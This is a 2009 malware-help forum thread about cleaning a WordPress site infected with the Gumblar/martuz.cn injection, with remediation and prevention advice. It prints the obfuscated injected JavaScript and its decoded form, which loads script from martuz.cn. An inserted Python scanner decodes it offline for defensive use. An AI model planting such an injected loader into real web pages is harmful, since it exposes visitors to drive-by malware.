Malware Domain List
Malware Related => Compromised Servers => Topic started by: garethplu on May 19, 2009, 11:09:38 pm
-
If someone's website goes to "martuz.cn" what can they do to fix it?
-
1. Remove all malicious scripts from ALL files (i.e. restore a backup)
2. Lock down ALL scripts (JS and PHP etc), and change FTP etc passwords
-
Thanks, how can I do that? Is there a step-by-step guide I can follow for someone with basic skills? Will my website host be able to help also?
-
Your host may have a backup, but you shouldn't rely on that. They will, however, be able to reset your FTP etc passwords for you.
If you don't have a clean copy of the website's files (e.g. stored locally on your computer), then your choices are severely limited as they are;
1. Download all of the files, and run through their respective source codes, and remove the malicious source code
2. Start the website from scratch
-
How do I know what the malicious source code is?
-
Can you post the URL to your website?
-
http://www.stadiatech.com
The one thing that really puzzles me: I have tried accessing my website from a few computers and it is only my computer which heads to "martuz.cn". Is that normal?!!!
MysteryFCM: URL disabled
-
Looking at your site's source code shows the following;
(function(DBCp){var O7l='%';eval(unescape((':76ar:20a:3d:22ScriptEngine:22:2cb:3d:22V:65r:73:69on():2b:22:2cj:3d:22:22:2cu:3d:6eaviga:74:6fr:2eu:73er:41g:65n:74:3bif((u:2einde:78Of(:22:43:68rom:65:22):3c:30):26:26(u:2eind:65xOf(:22W:69n:22):3e0):26:26(u:2eindexOf(:22NT:206:22:29:3c0):26:26(do:63ument:2ec:6fokie:2e:69nde:78Of(:22miek:3d1:22:29:3c:30):26:26:28:74y:70eo:66(z:72v:7at:73):21:3dtypeo:66(:22A:22))):7b:7a:72v:7ats:3d:22:41:22:3beva:6c(:22if:28wi:6ed:6f:77:2e:22+a+:22:29j:3dj+:22+a:2b:22:4da:6ao:72:22+b+a+:22M:69nor:22:2bb+:61+:22:42u:69l:64:22:2bb+:22:6a:3b:22):3bd:6fc:75ment:2ewrite:28:22:3cscript:20src:3d:2f:2fmart:22:2b:22uz:2ec:6e:2fvid:2f:3fid:3d:22:2bj+:22:3e:3c:5c:2f:73c:72ipt:3e:22):3b:7d').replace(DBCp,O7l)))})(/\:/g);
Which decodes to;
var a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent;if((u.indexOf("Chrome")<0)&&(u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){zrvzts="A";eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");document.write("<script src=//mart"+"uz.cn/vid/?id="+j+"><\/script>");}
You're rather lucky here, as long as the script is the same in all files, as all you need to do is search for the string "mart", as the obfuscation is extremely basic.
On your homepage, this script appears just next to the "HEAD" HTML tag;
-
The one thing that really puzzles me: I have tried accessing my website from a few computers and it is only my computer which heads to "martuz.cn". Is that normal?!!!
It depends entirely on the settings of the browser and the firewall (i.e. if the browser is set to block JavaScript it won't load, and if the firewall is corporately owned, it's likely already set to block this domain)
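The wrapper quoted above only swaps ':' for '%' and then runs unescape() on the result, which is why a plain search for "mart" finds it. The script below is an added example (not code from the thread or from MysteryFCM) that undoes that wrapper offline, collapses the "mart"+"uz" string splitting, and reports every copy found in a page's source; the SAMPLE is the exact obfuscated line posted in the thread, and the page fragment around it is constructed.

```python
"""Decode the colon-escaped eval()/unescape() wrapper from the martuz.cn
injection and scan page source for it. Added example, not from the thread."""
import re
from urllib.parse import unquote

# Shape of the injected wrapper quoted in the thread:
#   (function(X){var Y='%';eval(unescape(('<payload>').replace(X,Y)))})(/\:/g);
# Group 1: the real percent char; group 2: the payload; group 3: the stand-in
# character the payload uses instead of '%' (':' in the posted sample).
WRAPPER_RE = re.compile(
    r"\(function\(\w+\)\{var\s+\w+\s*=\s*'(.)';"
    r"eval\(unescape\(\('([^']+)'\)\.replace\(\w+,\s*\w+\)\)\)\}\)"
    r"\(/\\?(.)/g\);"
)

# The obfuscated line exactly as it was posted in the thread.
SAMPLE = r"(function(DBCp){var O7l='%';eval(unescape((':76ar:20a:3d:22ScriptEngine:22:2cb:3d:22V:65r:73:69on():2b:22:2cj:3d:22:22:2cu:3d:6eaviga:74:6fr:2eu:73er:41g:65n:74:3bif((u:2einde:78Of(:22:43:68rom:65:22):3c:30):26:26(u:2eind:65xOf(:22W:69n:22):3e0):26:26(u:2eindexOf(:22NT:206:22:29:3c0):26:26(do:63ument:2ec:6fokie:2e:69nde:78Of(:22miek:3d1:22:29:3c:30):26:26:28:74y:70eo:66(z:72v:7at:73):21:3dtypeo:66(:22A:22))):7b:7a:72v:7ats:3d:22:41:22:3beva:6c(:22if:28wi:6ed:6f:77:2e:22+a+:22:29j:3dj+:22+a:2b:22:4da:6ao:72:22+b+a+:22M:69nor:22:2bb+:61+:22:42u:69l:64:22:2bb+:22:6a:3b:22):3bd:6fc:75ment:2ewrite:28:22:3cscript:20src:3d:2f:2fmart:22:2b:22uz:2ec:6e:2fvid:2f:3fid:3d:22:2bj+:22:3e:3c:5c:2f:73c:72ipt:3e:22):3b:7d').replace(DBCp,O7l)))})(/\:/g);"

def js_unescape(s: str) -> str:
    """Python stand-in for JavaScript unescape(): %XX and %uXXXX sequences."""
    s = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), s)
    return unquote(s, encoding="latin-1")  # one char per %XX, like unescape()

def decode_wrapper(m: "re.Match[str]") -> str:
    """Undo the .replace()/unescape() pair without executing any of it."""
    pct, payload, stand_in = m.group(1), m.group(2), m.group(3)
    return js_unescape(payload.replace(stand_in, pct))

def normalize(js: str) -> str:
    """Collapse "mart"+"uz" style string splitting so indicators read whole."""
    return re.sub(r'"\s*\+\s*"', "", js)

def scan_source(html: str) -> list:
    """Find every wrapper in a page's source and decode it for review."""
    hits = []
    for m in WRAPPER_RE.finditer(html):
        decoded = decode_wrapper(m)
        hits.append({"offset": m.start(), "decoded": decoded,
                     # a naive grep for the full hostname misses the split form
                     "martuz": "martuz.cn" in normalize(decoded)})
    return hits

# Constructed page fragment: the wrapper sitting next to <head>, as described.
PAGE = "<html>" + SAMPLE + "<head><title>x</title></head><body></body></html>"

if __name__ == "__main__":
    for hit in scan_source(PAGE):
        print(hit["offset"], hit["martuz"], hit["decoded"][:60])
```

Run it against each downloaded theme or PHP file instead of PAGE to list what to strip; the decoded text is only printed, never evaluated.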
-
Since you're using WordPress by the way, the main files you need to reinstall and/or clean, are your themes (located in /wp-content/themes), though I'd recommend checking ALL of the files just to be on the safe side, as chances are, they'll have also uploaded a shell to enable them to re-access your site, should the FTP credentials be changed. If you're comfortable doing so, it will be much quicker and much easier, to delete the WordPress files, and re-upload a clean copy of them (you can obtain the WordPress files from wordpress.org)
-
I recommend deleting all files at your site and restoring everything from a clean backup. Some PHP files have been added by this malware, for example /images/gifimg.php. I don't recommend sorting out the files manually.
Please change the password of your site and restore your site completely from a backup.
Don't try to fix individual files if you don't know exactly what you are doing.
-
If it comes to it, can I pay someone to fix this and similar problems?
-
Your hosting company would probably be happy to do it for you. If not, post back here and I'll do it for free for you.
-
Cheers dude, the world needs more people like you.
I shall speak with the host and see what they say. The RSS no longer works, do you think it's related?
-
More than likely, yes.
-
Damn.
I've tried a feed validator http://feedvalidator.org/check.cgi?url=http%3A%2F%2Fwww.stadiatech.com%2Ffeed#l241
and it tells me that line 241 is wrong. I have been using the WordPress forum for two days now but the operator of the forum keeps telling me to find the code. I'm not sure how to find the code, what code I'm looking for or what to do if I find it.
I have changed my FTP password btw.
-
The feed likely won't validate whilst the code is present.
Follow the steps below to clean it out;
1. Login to your site via FTP
2. Delete the contents of the htdocs/wwwroot/public_html (or whichever it's called) folder
3. Download the following and extract the contents;
http://wordpress.org/latest.zip
4. Upload the ENTIRE contents of the zip
IMPORTANT: You MUST ensure you make a copy of your wp-config.php file BEFORE doing step 2, as you'll need the database credentials and information, present in this file, to put into the new wp-config.php file, prior to uploading it
Please note, once this is done, you will need to re-install any plugins you had installed.
-
Sorry Steve,
I've had a good look and I don't recognise this file or anything based on "wwwroot" or "public_html": "htdocs/wwwroot/public_html"
I notice the zip file is of 2.7.1 which I have installed (this install led to the problem)
Many thanks for the help you're giving, by the way.
-
No problem.
If you'd prefer I do it for you, please e-mail me at;
mdl @ it-mate.co.uk
The only thing I'll need is your FTP credentials.
-
Hi,
This is what my host came back to me with:
"I visited and checked your website www.stadiatech.com but it does not prompt for a virus threat and also the site loads just fine. It did not even try to redirect the page to martuz.cn."
I'm starting to find this very stressful. I don't know why my host can't find the problem and fix it.
-
I've just checked, and the problem is definitely still there. Either they didn't look properly, used a browser with JS disabled, or both. Feel free to point them here if need be;
http://vurl.mysteryfcm.co.uk/?url=625774
The script is on line #39
-
That's what they told me on the WordPress website, but I can't find that code.
If I delete that will it sort this problem?
Thanks.
-
You could just delete the code, yes (see /wp-content/themes/{theme}/header.php), however, these types of attacks have usually seen extra files added, so they can still get in even when the FTP password is changed, so it's a much better idea just to do a complete refresh.
As mentioned, we'll be happy to help you do this if necessary :)
-
Thanks Steve, so how did the code get in there? Is it a virus and does it have a particular purpose? Is there a way of ensuring it doesn't happen again?
How did you get so knowledgeable about this stuff?
-
Most of the gumblar/martuz infections are done by sniffing the computer that usually connects to it for FTP etc passwords (which also means you'll need to check your machine), for details, please refer to;
http://www.malwaredomainlist.com/forums/index.php?topic=2892.msg9833#msg9833
http://www.martinsecurity.net/2009/05/20/inside-the-massive-gumblar-attacka-dentro-del-enorme-ataque-gumblar/
One of the samples we've seen has shown it to create both a _.exe and e.bat file (amongst other things) in the root of the infected machine (usually C:\), so it will be worth checking your machine for signs of this infection. For details, please see;
http://www.threatexpert.com/report.aspx?md5=2131112053ed144c46277b9024bcf39f
As far as prevention of this happening again, there are a couple of things you can do;
1. Change your FTP password (I know you've done that already, but I suggest doing it frequently (at least weekly))
2. DO NOT use regular FTP as passwords are sent in plain text - use sFTP (Secure FTP) instead if your host allows it
3. Backup your site frequently - this way, if it does happen again, you can just delete the current files, and restore the backup (again, the backup should be stored in a secure location)
4. Keep your computer up to date (e.g. install Windows patches and such) - not guaranteed to prevent it, but will help
5. Install a firewall on your local computer (this will also help prevent infections sending out your data - again not a guarantee, but will help)
Finally, and most importantly - keep WordPress (and any plugins you have installed) up to date - this will help prevent infections occurring via SQL injection etc.
Again however, none of the above will guarantee to prevent this occurring again - there are no guarantees when it comes to this type of thing unfortunately.
As for how I became knowledgeable, I'm self taught ;) (you'll usually find this is the same for the vast majority of people)
-
Thanks Steve,
I have now received an email from Google.
Thanks for your advice but how do I follow points 2 and 3.
What is Secure FTP and how do I backup the site?
-
sFTP is done in pretty much the same fashion as FTP;
http://winscp.net/eng/docs/protocols#sftp
http://en.wikipedia.org/wiki/SSH_File_Transfer_Protocol
With regards to backing up your site, the easiest way to back up the files is by FTP. Your site's database can be backed up either via the WordPress ACP, or via phpMyAdmin (if you've got it installed on the server)